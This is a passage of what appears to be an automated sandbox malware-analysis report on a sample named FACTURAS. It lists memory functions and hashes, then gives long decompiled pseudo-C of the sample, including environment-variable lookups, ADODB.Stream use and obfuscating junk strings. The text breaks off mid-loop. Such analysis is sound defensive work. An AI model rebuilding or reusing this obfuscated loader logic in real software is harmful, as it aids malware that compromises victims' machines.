Opcode Fuzzy Hash: ed274972b255b977749a56d961ba3634663b5976f775048d906cac651669a68d
Instruction Fuzzy Hash: 24713571A06248CFDBB8DE38C9A43FE37A1BF44380F55401ACC4A8B650D734AA41CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 0306DB52, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 167
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(12952C1F,?,-0000000126A79646), ref: 0306DED1

Strings

IJ, xrefs: 0306DF30

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: IJ
API String ID: 2167126740-1401145438
Opcode ID: 1e0f674c9116ef8b07ac6bc3fc78e6f6a5c4f220d4b33c36a45e68f7acbea724
Instruction ID: 3749fd6d156eb3061a00e6e976ddfb4ae0108099f732510e5259b0c6f823227b
Opcode Fuzzy Hash: 1e0f674c9116ef8b07ac6bc3fc78e6f6a5c4f220d4b33c36a45e68f7acbea724
Instruction Fuzzy Hash: BB510231708705DBE724CF35C8883E9B3B6EFA5710F65415EE8489BA51CBB25678DB04

Uniqueness

Uniqueness Score: -1.00%

Function 0306DC8C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 142
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(12952C1F,?,-0000000126A79646), ref: 0306DED1

Strings

IJ, xrefs: 0306DF30

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: IJ
API String ID: 2167126740-1401145438
Opcode ID: dd31247261f17f03db0aa2ea44c85e496ffa3a6d9c6e698de7144514473749f5
Instruction ID: 4d31f8319344876be4b8ecddd7a07337eeea7ef85e0d8919100510eaca80232c
Opcode Fuzzy Hash: dd31247261f17f03db0aa2ea44c85e496ffa3a6d9c6e698de7144514473749f5
Instruction Fuzzy Hash: 6751BF3160C705DBE728CF25C8483E9F3B6EFA5310F64429EE8585A951CFB21678DB04

Uniqueness

Uniqueness Score: -1.00%

Function 0306DB0E, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 125
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(12952C1F,?,-0000000126A79646), ref: 0306DED1

Strings

IJ, xrefs: 0306DF30

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: IJ
API String ID: 2167126740-1401145438
Opcode ID: 8d458d375643145397a16e97725922511ff03f03e8000b0d731f84e27a55530e
Instruction ID: 5622d954d2ad4d5fc7241abd72058fbea724581784db8c93548a77c73b4b2b84
Opcode Fuzzy Hash: 8d458d375643145397a16e97725922511ff03f03e8000b0d731f84e27a55530e
Instruction Fuzzy Hash: C74101B66063899FEB30DF24CC807EE37A6EF8A750F940059DC8D9B355C2725A45CB16

Uniqueness

Uniqueness Score: -1.00%

Function 0306DE06, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 99
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(12952C1F,?,-0000000126A79646), ref: 0306DED1

Strings

IJ, xrefs: 0306DF30

Memory Dump Source

Source File: 00000000.00000002.862055491.0000000003060000.00000040.00000001.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_FACTURAS.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: IJ
API String ID: 2167126740-1401145438
Opcode ID: 7cabc3d7d3a6884c68c3a522da4828febf4d2d6601016f23f4e19cbdccb5240f
Instruction ID: cc31e80573b85148e6b8c2c9f611345469e89104236baa5d2e44c5672a95f83d
Opcode Fuzzy Hash: 7cabc3d7d3a6884c68c3a522da4828febf4d2d6601016f23f4e19cbdccb5240f
Instruction Fuzzy Hash: 79319E3160CB02DBD319CF76C84C3A9F376EFA5310B64829EE86458852CFB25178EB04

Uniqueness

Uniqueness Score: -1.00%

Function 0041E02C, Relevance: 498.6, APIs: 255, Strings: 29, Instructions: 1650
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0041E02C(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v0;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v28;
				void* _v32;
				short _v36;
				void* _v40;
				signed int _v44;
				void* _v48;
				void* _v52;
				intOrPtr _v56;
				signed int _v60;
				char _v64;
				signed int _v68;
				char _v72;
				intOrPtr _v76;
				short _v80;
				signed int _v84;
				signed int _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v108;
				intOrPtr _v116;
				char _v120;
				char _v124;
				intOrPtr _v132;
				char _v140;
				char* _v144;
				intOrPtr _v152;
				char _v156;
				char* _v164;
				char _v172;
				char* _v176;
				char* _v180;
				char _v184;
				char _v188;
				signed int _v192;
				signed int _v196;
				intOrPtr* _v200;
				signed int _v204;
				signed int _v212;
				intOrPtr _v216;
				signed int _v220;
				signed int* _v224;
				signed int _v228;
				signed int _v232;
				signed int* _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				void* _v256;
				signed int _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				char _v284;
				signed int _v288;
				intOrPtr _v292;
				signed int _v296;
				signed int _v300;
				signed int* _v304;
				signed int _v308;
				signed int _v312;
				signed int* _v316;
				signed int _v320;
				signed int _v324;
				signed int* _v328;
				signed int _v332;
				signed int _v336;
				signed int* _v340;
				signed int _v344;
				signed int _v348;
				signed int* _v352;
				signed int _v356;
				signed int _v360;
				signed int* _v364;
				signed int _v368;
				signed int _v372;
				signed int* _v376;
				signed int _v380;
				signed int _v384;
				signed int* _v388;
				signed int _v392;
				signed int _v396;
				signed int* _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _t770;
				signed int _t771;
				signed int _t772;
				signed int _t782;
				signed int _t783;
				signed int _t789;
				signed int _t794;
				signed int* _t801;
				signed int* _t803;
				signed int _t819;
				signed int _t825;
				signed int _t830;
				signed int _t836;
				signed int _t840;
				signed int _t846;
				signed int _t851;
				char* _t857;
				signed int _t867;
				signed int _t872;
				signed int _t880;
				signed int _t885;
				signed int _t892;
				signed int _t897;
				signed int _t904;
				signed int _t909;
				short _t910;
				char* _t912;
				signed int _t919;
				signed int _t924;
				signed int _t931;
				signed int _t936;
				signed int _t942;
				signed int _t944;
				signed int _t947;
				intOrPtr _t950;
				intOrPtr _t954;
				signed int _t960;
				signed int _t970;
				signed int _t974;
				signed int _t981;
				signed int _t986;
				signed int _t997;
				signed int _t1002;
				signed int _t1010;
				signed int _t1017;
				signed int _t1020;
				signed int _t1022;
				char* _t1024;
				char* _t1035;
				signed int* _t1046;
				char* _t1069;
				char* _t1073;
				char* _t1084;
				void* _t1091;
				signed int* _t1214;
				void* _t1286;
				void* _t1292;
				void* _t1298;
				void* _t1299;
				void* _t1301;
				intOrPtr _t1302;
				void* _t1303;
				void* _t1307;
				intOrPtr _t1310;
				char _t1332;

				_t1292 = __esi;
				_t1286 = __edi;
				_t1091 = __ebx;
				_t1299 = _t1301;
				_t1302 = _t1301 - 0xc;
				 *[fs:0x0] = _t1302;
				L00401390();
				_v16 = _t1302;
				_v12 = 0x4012a8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401396, _t1298);
				_t770 =  *((intOrPtr*)( *_a4 + 0x290))(_a4,  &_v240);
				asm("fclex");
				_v248 = _t770;
				if(_v248 >= 0) {
					_t16 =  &_v300;
					 *_t16 = _v300 & 0x00000000;
					__eflags =  *_t16;
				} else {
					_push(0x290);
					_push(0x402958);
					_push(_a4);
					_push(_v248);
					L00401624();
					_v300 = _t770;
				}
				_t771 = _v240;
				 *((intOrPtr*)(_a4 + 0x84)) = _t771;
				_v164 = L"userprofile";
				_v172 = 8;
				L0040160C();
				_push(0x2e6a19);
				L00401600();
				L00401672();
				_push(_t771);
				_t772 =  &_v108;
				_push(_t772);
				L004015DC();
				L00401672();
				_push(_t772);
				L0040156A();
				asm("sbb eax, eax");
				_v248 =  ~( ~( ~_t772));
				_push( &_v88);
				_push( &_v84);
				_push(2);
				L0040159A();
				_t1303 = _t1302 + 0xc;
				L00401606();
				if(_v248 == 0) {
					L107:
					_t782 =  *((intOrPtr*)( *_a4 + 0x260))(_a4,  &_v240);
					asm("fclex");
					_v248 = _t782;
					if(_v248 >= 0) {
						_t600 =  &_v412;
						 *_t600 = _v412 & 0x00000000;
						__eflags =  *_t600;
					} else {
						_push(0x260);
						_push(0x402958);
						_push(_a4);
						_push(_v248);
						L00401624();
						_v412 = _t782;
					}
					_t783 = _v240;
					_v76 = _t783;
					_v28 = 0x52bf;
					asm("wait");
					_push(0x41f57b);
					L0040165A();
					L0040165A();
					L0040161E();
					L0040165A();
					L0040165A();
					L0040165A();
					L0040165A();
					L0040165A();
					return _t783;
				} else {
					if( *0x4223f0 != 0) {
						_v304 = 0x4223f0;
					} else {
						_push(0x4223f0);
						_push(0x402d44);
						L0040162A();
						_v304 = 0x4223f0;
					}
					_v248 =  *_v304;
					_t789 =  *((intOrPtr*)( *_v248 + 0x14))(_v248,  &_v92);
					asm("fclex");
					_v252 = _t789;
					if(_v252 >= 0) {
						_t46 =  &_v308;
						 *_t46 = _v308 & 0x00000000;
						__eflags =  *_t46;
					} else {
						_push(0x14);
						_push(0x402d34);
						_push(_v248);
						_push(_v252);
						L00401624();
						_v308 = _t789;
					}
					_v256 = _v92;
					_t794 =  *((intOrPtr*)( *_v256 + 0xf8))(_v256,  &_v84);
					asm("fclex");
					_v260 = _t794;
					if(_v260 >= 0) {
						_t59 =  &_v312;
						 *_t59 = _v312 & 0x00000000;
						__eflags =  *_t59;
					} else {
						_push(0xf8);
						_push(0x402d54);
						_push(_v256);
						_push(_v260);
						L00401624();
						_v312 = _t794;
					}
					_v284 = _v84;
					_v84 = _v84 & 0x00000000;
					L00401672();
					L0040161E();
					_v164 = L"windir";
					_v172 = 8;
					L0040160C();
					_push( &_v108);
					_push( &_v124);
					L00401510();
					_v180 = L"extoller";
					_v188 = 8;
					L0040160C();
					_push( &_v140);
					_push( &_v156);
					L0040154C();
					_push(0);
					_push(0xffffffff);
					_push(1);
					_push(L"svinghjulsarm");
					_push( &_v156);
					_t801 =  &_v88;
					_push(_t801);
					L00401666();
					_push(_t801);
					_push( &_v124);
					_t803 =  &_v84;
					_push(_t803);
					L00401666();
					_push(_t803);
					L00401546();
					L00401672();
					_push( &_v88);
					_push( &_v84);
					_push(2);
					L0040159A();
					_push( &_v156);
					_push( &_v124);
					_push( &_v140);
					_push( &_v108);
					_push(4);
					L00401654();
					L00401504();
					_v100 =  *0x4012a0;
					_v108 = 4;
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xffffffff);
					_push( &_v108);
					L0040150A();
					L00401672();
					L00401642();
					L0040165A();
					L00401606();
					_v100 = 0x52bae5;
					_v108 = 3;
					_push( &_v108);
					_push( &_v124);
					L004014FE();
					_push( &_v124);
					L004015AC();
					L00401672();
					L00401642();
					L0040165A();
					_push( &_v124);
					_push( &_v108);
					_push(2);
					L00401654();
					L00401642();
					_v164 = 0x403144;
					_v172 = 8;
					L0040160C();
					_push( &_v108);
					_push(0x97);
					_push( &_v124);
					L004015C4();
					_push(_v264);
					_t819 =  &_v124;
					_push(_t819);
					L004015AC();
					L00401672();
					_push(_t819);
					L0040156A();
					asm("sbb eax, eax");
					_v240 =  ~( ~_t819 + 1);
					L0040165A();
					_push( &_v124);
					_push( &_v108);
					_push(2);
					L00401654();
					_t1307 = _t1303 + 0x38;
					_t825 = _v240;
					if(_t825 == 0) {
						_push(_v264);
						_push(L"Wayment7");
						L0040156A();
						__eflags = _t825;
						if(_t825 != 0) {
							_push(_v264);
							_push(L"archemastry");
							L0040166C();
							L00401672();
							_push(_t825);
							L0040156A();
							asm("sbb eax, eax");
							_v240 =  ~( ~_t825 + 1);
							L0040165A();
							__eflags = _v240;
							if(_v240 == 0) {
								_v164 = 0x80020004;
								_v172 = 0xa;
								_push(_v264);
								_t830 = 0x10;
								L00401390();
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_push(L"NONFAT");
								_push(L"OVERPRIZER");
								_push(L"Uigennemsigtighedens9"); // executed
								L004014B6(); // executed
								L00401672();
								_push(_t830);
								L0040156A();
								asm("sbb eax, eax");
								_v240 =  ~( ~_t830 + 1);
								L0040165A();
								__eflags = _v240;
								if(_v240 == 0) {
									_push( &_v108);
									L004014AA();
									_push(_v264);
									_t836 =  &_v108;
									_push(_t836);
									L004015AC();
									L00401672();
									_push(_t836);
									L0040156A();
									asm("sbb eax, eax");
									_v240 =  ~( ~_t836 + 1);
									L0040165A();
									L00401606();
									_t840 = _v240;
									__eflags = _t840;
									if(_t840 == 0) {
										_push(_v264);
										_push(L"Tegngivningers5");
										L0040156A();
										__eflags = _t840;
										if(_t840 == 0) {
											__eflags =  *0x4223f0;
											if( *0x4223f0 != 0) {
												_v388 = 0x4223f0;
											} else {
												_push(0x4223f0);
												_push(0x402d44);
												L0040162A();
												_v388 = 0x4223f0;
											}
											_v248 =  *_v388;
											_t846 =  *((intOrPtr*)( *_v248 + 0x14))(_v248,  &_v92);
											asm("fclex");
											_v252 = _t846;
											__eflags = _v252;
											if(_v252 >= 0) {
												_t515 =  &_v392;
												 *_t515 = _v392 & 0x00000000;
												__eflags =  *_t515;
											} else {
												_push(0x14);
												_push(0x402d34);
												_push(_v248);
												_push(_v252);
												L00401624();
												_v392 = _t846;
											}
											_v256 = _v92;
											_t851 =  *((intOrPtr*)( *_v256 + 0xc0))(_v256,  &_v240);
											asm("fclex");
											_v260 = _t851;
											__eflags = _v260;
											if(_v260 >= 0) {
												_t528 =  &_v396;
												 *_t528 = _v396 & 0x00000000;
												__eflags =  *_t528;
											} else {
												_push(0xc0);
												_push(0x402d54);
												_push(_v256);
												_push(_v260);
												L00401624();
												_v396 = _t851;
											}
											 *((short*)(_a4 + 0xda)) = _v240;
											L0040161E();
											_v164 = 0x403334;
											_v172 = 8;
											L0040160C();
											_push( &_v108);
											_push( &_v124);
											L00401510();
											_v180 = L"\\qb30Ii7QgBt9vIUPKwgIth148";
											_v188 = 8;
											_push( &_v124);
											_push( &_v188);
											_t857 =  &_v140;
											_push(_t857);
											L004014EC();
											_push(_t857);
											L004015AC();
											L00401672();
											_push(_t857);
											_push(1);
											_push(0xffffffff);
											_push(0x20);
											L004014A4();
											L0040165A();
											_push( &_v140);
											_push( &_v124);
											_push( &_v108);
											_push(3);
											L00401654();
											L00401642();
											_push(1);
											_push( &_v84);
											_push(0);
											L0040149E();
											L0040165A();
											_push(1);
											L00401498();
											__eflags =  *0x4223f0;
											if( *0x4223f0 != 0) {
												_v400 = 0x4223f0;
											} else {
												_push(0x4223f0);
												_push(0x402d44);
												L0040162A();
												_v400 = 0x4223f0;
											}
											_v248 =  *_v400;
											_t867 =  *((intOrPtr*)( *_v248 + 0x14))(_v248,  &_v92);
											asm("fclex");
											_v252 = _t867;
											__eflags = _v252;
											if(_v252 >= 0) {
												_t566 =  &_v404;
												 *_t566 = _v404 & 0x00000000;
												__eflags =  *_t566;
											} else {
												_push(0x14);
												_push(0x402d34);
												_push(_v248);
												_push(_v252);
												L00401624();
												_v404 = _t867;
											}
											_v256 = _v92;
											_t872 =  *((intOrPtr*)( *_v256 + 0x108))(_v256,  &_v240);
											asm("fclex");
											_v260 = _t872;
											__eflags = _v260;
											if(_v260 >= 0) {
												_t579 =  &_v408;
												 *_t579 = _v408 & 0x00000000;
												__eflags =  *_t579;
											} else {
												_push(0x108);
												_push(0x402d54);
												_push(_v256);
												_push(_v260);
												L00401624();
												_v408 = _t872;
											}
											_v64 = _v240;
											L0040161E();
											_v100 = 0xfe;
											_v108 = 2;
											_push( &_v108);
											_push(0xaa);
											_push(L"KATTEMUSIKKEN");
											L004014E0();
											L00401672();
											__eflags = _a4 + 0xdc;
											L00401642();
											L0040165A();
											L00401606();
										}
									} else {
										__eflags =  *0x4223f0;
										if( *0x4223f0 != 0) {
											_v352 = 0x4223f0;
										} else {
											_push(0x4223f0);
											_push(0x402d44);
											L0040162A();
											_v352 = 0x4223f0;
										}
										_v248 =  *_v352;
										_t880 =  *((intOrPtr*)( *_v248 + 0x14))(_v248,  &_v92);
										asm("fclex");
										_v252 = _t880;
										__eflags = _v252;
										if(_v252 >= 0) {
											_t413 =  &_v356;
											 *_t413 = _v356 & 0x00000000;
											__eflags =  *_t413;
										} else {
											_push(0x14);
											_push(0x402d34);
											_push(_v248);
											_push(_v252);
											L00401624();
											_v356 = _t880;
										}
										_v256 = _v92;
										_t885 =  *((intOrPtr*)( *_v256 + 0xe0))(_v256,  &_v84);
										asm("fclex");
										_v260 = _t885;
										__eflags = _v260;
										if(_v260 >= 0) {
											_t426 =  &_v360;
											 *_t426 = _v360 & 0x00000000;
											__eflags =  *_t426;
										} else {
											_push(0xe0);
											_push(0x402d54);
											_push(_v256);
											_push(_v260);
											L00401624();
											_v360 = _t885;
										}
										_v296 = _v84;
										_v84 = _v84 & 0x00000000;
										L00401672();
										L0040161E();
										__eflags =  *0x4223f0;
										if( *0x4223f0 != 0) {
											_v364 = 0x4223f0;
										} else {
											_push(0x4223f0);
											_push(0x402d44);
											L0040162A();
											_v364 = 0x4223f0;
										}
										_v248 =  *_v364;
										_t892 =  *((intOrPtr*)( *_v248 + 0x14))(_v248,  &_v92);
										asm("fclex");
										_v252 = _t892;
										__eflags = _v252;
										if(_v252 >= 0) {
											_t448 =  &_v368;
											 *_t448 = _v368 & 0x00000000;
											__eflags =  *_t448;
										} else {
											_push(0x14);
											_push(0x402d34);
											_push(_v248);
											_push(_v252);
											L00401624();
											_v368 = _t892;
										}
										_v256 = _v92;
										_t897 =  *((intOrPtr*)( *_v256 + 0x68))(_v256,  &_v240);
										asm("fclex");
										_v260 = _t897;
										__eflags = _v260;
										if(_v260 >= 0) {
											_t461 =  &_v372;
											 *_t461 = _v372 & 0x00000000;
											__eflags =  *_t461;
										} else {
											_push(0x68);
											_push(0x402d54);
											_push(_v256);
											_push(_v260);
											L00401624();
											_v372 = _t897;
										}
										 *((short*)(_a4 + 0xd8)) = _v240;
										L0040161E();
										__eflags =  *0x4223f0;
										if( *0x4223f0 != 0) {
											_v376 = 0x4223f0;
										} else {
											_push(0x4223f0);
											_push(0x402d44);
											L0040162A();
											_v376 = 0x4223f0;
										}
										_v248 =  *_v376;
										_t904 =  *((intOrPtr*)( *_v248 + 0x14))(_v248,  &_v92);
										asm("fclex");
										_v252 = _t904;
										__eflags = _v252;
										if(_v252 >= 0) {
											_t480 =  &_v380;
											 *_t480 = _v380 & 0x00000000;
											__eflags =  *_t480;
										} else {
											_push(0x14);
											_push(0x402d34);
											_push(_v248);
											_push(_v252);
											L00401624();
											_v380 = _t904;
										}
										_v256 = _v92;
										_t909 =  *((intOrPtr*)( *_v256 + 0x78))(_v256,  &_v240);
										asm("fclex");
										_v260 = _t909;
										__eflags = _v260;
										if(_v260 >= 0) {
											_t493 =  &_v384;
											 *_t493 = _v384 & 0x00000000;
											__eflags =  *_t493;
										} else {
											_push(0x78);
											_push(0x402d54);
											_push(_v256);
											_push(_v260);
											L00401624();
											_v384 = _t909;
										}
										_t910 = _v240;
										_v72 = _t910;
										L0040161E();
										L00401582();
										L00401672();
										_push(_t910);
										L0040152E();
										L00401672();
										L0040165A();
									}
								} else {
									_push(0);
									_push(L"ADODB.Stream");
									_push( &_v108);
									L004015E8();
									_t912 =  &_v108;
									_push(_t912);
									L004015EE();
									_push(_t912);
									_push( &_v36);
									L004015F4();
									L00401606();
									__eflags =  *0x4223f0;
									if( *0x4223f0 != 0) {
										_v316 = 0x4223f0;
									} else {
										_push(0x4223f0);
										_push(0x402d44);
										L0040162A();
										_v316 = 0x4223f0;
									}
									_v248 =  *_v316;
									_t919 =  *((intOrPtr*)( *_v248 + 0x14))(_v248,  &_v92);
									asm("fclex");
									_v252 = _t919;
									__eflags = _v252;
									if(_v252 >= 0) {
										_t306 =  &_v320;
										 *_t306 = _v320 & 0x00000000;
										__eflags =  *_t306;
									} else {
										_push(0x14);
										_push(0x402d34);
										_push(_v248);
										_push(_v252);
										L00401624();
										_v320 = _t919;
									}
									_v256 = _v92;
									_t924 =  *((intOrPtr*)( *_v256 + 0x78))(_v256,  &_v240);
									asm("fclex");
									_v260 = _t924;
									__eflags = _v260;
									if(_v260 >= 0) {
										_t319 =  &_v324;
										 *_t319 = _v324 & 0x00000000;
										__eflags =  *_t319;
									} else {
										_push(0x78);
										_push(0x402d54);
										_push(_v256);
										_push(_v260);
										L00401624();
										_v324 = _t924;
									}
									_v80 = _v240;
									L0040161E();
									__eflags =  *0x4223f0;
									if( *0x4223f0 != 0) {
										_v328 = 0x4223f0;
									} else {
										_push(0x4223f0);
										_push(0x402d44);
										L0040162A();
										_v328 = 0x4223f0;
									}
									_v248 =  *_v328;
									_t931 =  *((intOrPtr*)( *_v248 + 0x14))(_v248,  &_v92);
									asm("fclex");
									_v252 = _t931;
									__eflags = _v252;
									if(_v252 >= 0) {
										_t337 =  &_v332;
										 *_t337 = _v332 & 0x00000000;
										__eflags =  *_t337;
									} else {
										_push(0x14);
										_push(0x402d34);
										_push(_v248);
										_push(_v252);
										L00401624();
										_v332 = _t931;
									}
									_v256 = _v92;
									_t936 =  *((intOrPtr*)( *_v256 + 0x118))(_v256,  &_v244);
									asm("fclex");
									_v260 = _t936;
									__eflags = _v260;
									if(_v260 >= 0) {
										_t350 =  &_v336;
										 *_t350 = _v336 & 0x00000000;
										__eflags =  *_t350;
									} else {
										_push(0x118);
										_push(0x402d54);
										_push(_v256);
										_push(_v260);
										L00401624();
										_v336 = _t936;
									}
									L004014B0();
									_v44 = _t936;
									L0040161E();
									L00401582();
									L00401672();
									__eflags =  *0x4223f0;
									if( *0x4223f0 != 0) {
										_v340 = 0x4223f0;
									} else {
										_push(0x4223f0);
										_push(0x402d44);
										L0040162A();
										_v340 = 0x4223f0;
									}
									_v248 =  *_v340;
									_t942 =  *((intOrPtr*)( *_v248 + 0x14))(_v248,  &_v92);
									asm("fclex");
									_v252 = _t942;
									__eflags = _v252;
									if(_v252 >= 0) {
										_t369 =  &_v344;
										 *_t369 = _v344 & 0x00000000;
										__eflags =  *_t369;
									} else {
										_push(0x14);
										_push(0x402d34);
										_push(_v248);
										_push(_v252);
										L00401624();
										_v344 = _t942;
									}
									_v256 = _v92;
									_t944 = _v88;
									_v292 = _t944;
									_v88 = _v88 & 0x00000000;
									L00401672();
									_t947 =  *((intOrPtr*)( *_v256 + 0x138))(_v256, _t944, 1);
									asm("fclex");
									_v260 = _t947;
									__eflags = _v260;
									if(_v260 >= 0) {
										_t387 =  &_v348;
										 *_t387 = _v348 & 0x00000000;
										__eflags =  *_t387;
									} else {
										_push(0x138);
										_push(0x402d54);
										_push(_v256);
										_push(_v260);
										L00401624();
										_v348 = _t947;
									}
									_push( &_v88);
									_push( &_v84);
									_push(2);
									L0040159A();
									L0040161E();
								}
							} else {
								while(1) {
									_t950 = _a4;
									__eflags =  *((intOrPtr*)(_t950 + 0xb0)) - 0xb1;
									if( *((intOrPtr*)(_t950 + 0xb0)) >= 0xb1) {
										break;
									}
									_t244 = _a4 + 0xb0; // 0x25300000
									_t1020 =  *_t244 + 1;
									__eflags = _t1020;
									if(__eflags < 0) {
										L112:
										L00401492();
										_t1310 = _t1307 - 0xc;
										 *[fs:0x0] = _t1310;
										L00401390();
										_v272 = _t1310;
										_v268 = 0x4012c8;
										_v264 = 0;
										 *((intOrPtr*)( *_v252 + 4))(_v252, _t1286, _t1292, _t1091,  *[fs:0x0], 0x401396, _t1299);
										L00401642();
										L00401642();
										L0040148C();
										asm("fcomp qword [0x4012b8]");
										asm("fnstsw ax");
										asm("sahf");
										if(__eflags != 0) {
											__eflags =  *0x4223f0;
											if( *0x4223f0 != 0) {
												_v224 = 0x4223f0;
											} else {
												_push(0x4223f0);
												_push(0x402d44);
												L0040162A();
												_v224 = 0x4223f0;
											}
											_v192 =  *_v224;
											_t997 =  *((intOrPtr*)( *_v192 + 0x14))(_v192,  &_v72);
											asm("fclex");
											_v196 = _t997;
											__eflags = _v196;
											if(_v196 >= 0) {
												_t636 =  &_v228;
												 *_t636 = _v228 & 0x00000000;
												__eflags =  *_t636;
											} else {
												_push(0x14);
												_push(0x402d34);
												_push(_v192);
												_push(_v196);
												L00401624();
												_v228 = _t997;
											}
											_v200 = _v72;
											_t1002 =  *((intOrPtr*)( *_v200 + 0xb8))(_v200,  &_v188);
											asm("fclex");
											_v204 = _t1002;
											__eflags = _v204;
											if(_v204 >= 0) {
												_t649 =  &_v232;
												 *_t649 = _v232 & 0x00000000;
												__eflags =  *_t649;
											} else {
												_push(0xb8);
												_push(0x402d54);
												_push(_v200);
												_push(_v204);
												L00401624();
												_v232 = _t1002;
											}
											_v36 = _v188;
											L0040161E();
											_v144 = L"Chemotropism1";
											_v152 = 8;
											L0040160C();
											_push( &_v88);
											_push( &_v104);
											L004014E6();
											_push( &_v104);
											L004015AC();
											L00401672();
											_push( &_v104);
											_push( &_v88);
											_push(2);
											L00401654();
											_v144 = 0x4033d8;
											_v152 = 8;
											L0040160C();
											_push( &_v88);
											_push(0xc8);
											L00401486();
											L00401672();
											_t1010 = _v68;
											_v216 = _t1010;
											_v68 = _v68 & 0x00000000;
											_push(0xd1);
											L00401672();
											_push(_t1010);
											L00401564();
											L00401672();
											L00401642();
											_push( &_v68);
											_push( &_v64);
											_push( &_v60);
											_push(3);
											L0040159A();
											_t1310 = _t1310 + 0x1c;
											L00401606();
											_push(L"Gatfinnes");
											L0040166C();
											L00401672();
											__eflags = _v0 + 0xe4;
											L00401642();
											L0040165A();
										}
										_v96 = 0x80020004;
										_v104 = 0xa;
										_v80 = 0x2cca9c;
										_v88 = 3;
										_push(1);
										_push(1);
										_push( &_v104);
										_push( &_v88);
										_push( &_v120);
										L0040164E();
										_v176 = L"Formindskedes7";
										_v184 = 0x8008;
										_push( &_v120);
										_t970 =  &_v184;
										_push(_t970);
										L00401480();
										_v192 = _t970;
										_push( &_v120);
										_push( &_v104);
										_push( &_v88);
										_push(3);
										L00401654();
										_t974 = _v192;
										__eflags = _t974;
										if(_t974 != 0) {
											_v80 = 0x73b4a7;
											_v88 = 3;
											_push( &_v88);
											L00401540();
											L00401672();
											L00401606();
											__eflags =  *0x4223f0;
											if( *0x4223f0 != 0) {
												_v236 = 0x4223f0;
											} else {
												_push(0x4223f0);
												_push(0x402d44);
												L0040162A();
												_v236 = 0x4223f0;
											}
											_v192 =  *_v236;
											_t981 =  *((intOrPtr*)( *_v192 + 0x14))(_v192,  &_v72);
											asm("fclex");
											_v196 = _t981;
											__eflags = _v196;
											if(_v196 >= 0) {
												_t719 =  &_v240;
												 *_t719 = _v240 & 0x00000000;
												__eflags =  *_t719;
											} else {
												_push(0x14);
												_push(0x402d34);
												_push(_v192);
												_push(_v196);
												L00401624();
												_v240 = _t981;
											}
											_v200 = _v72;
											_t986 =  *((intOrPtr*)( *_v200 + 0xf8))(_v200,  &_v60);
											asm("fclex");
											_v204 = _t986;
											__eflags = _v204;
											if(_v204 >= 0) {
												_t732 =  &_v244;
												 *_t732 = _v244 & 0x00000000;
												__eflags =  *_t732;
											} else {
												_push(0xf8);
												_push(0x402d54);
												_push(_v200);
												_push(_v204);
												L00401624();
												_v244 = _t986;
											}
											_v220 = _v60;
											_v60 = _v60 & 0x00000000;
											L00401672();
											L0040161E();
											_push(0xc9);
											_push(L"PHYSIANTHROPY");
											L00401528();
											L00401672();
											L00401642();
											L0040165A();
											_v144 = L"APETALOUSNESS";
											_v152 = 8;
											L0040160C();
											_push(0xb2);
											_push( &_v88);
											_push( &_v104);
											L004014F8();
											_push( &_v104);
											L004015AC();
											L00401672();
											__eflags = _v0 + 0xec;
											L00401642();
											L0040165A();
											_push( &_v104);
											_t974 =  &_v88;
											_push(_t974);
											_push(2);
											L00401654();
										}
										_v56 = 0x1724f8;
										asm("wait");
										_push(0x41faf3);
										L0040165A();
										L0040165A();
										L0040165A();
										L0040165A();
										L0040165A();
										return _t974;
									} else {
										 *(_a4 + 0xb0) = _t1020;
										_t1022 = _v60 * 2;
										__eflags = _t1022;
										if(__eflags < 0) {
											goto L112;
										} else {
											_v60 = _t1022;
											continue;
										}
									}
									goto L137;
								}
								_push(0xf8);
								_push( &_v108);
								L004014C8();
								_push( &_v108);
								L004015AC();
								L00401672();
								L00401606();
								_push(0);
								_push(0xffffffff);
								_push(1);
								_push(L"Equalised4");
								_push(L"HOGMANES");
								_push(L"indskrumpning");
								L00401546();
								L00401672();
								L00401642();
								L0040165A();
								_t954 = _a4 + 0xbc;
								_push(_t954);
								_push(1);
								L004014C2();
								_v272 = _t954;
								_v268 = 2;
								 *(_a4 + 0xd4) =  *(_a4 + 0xd4) & 0x00000000;
								while(1) {
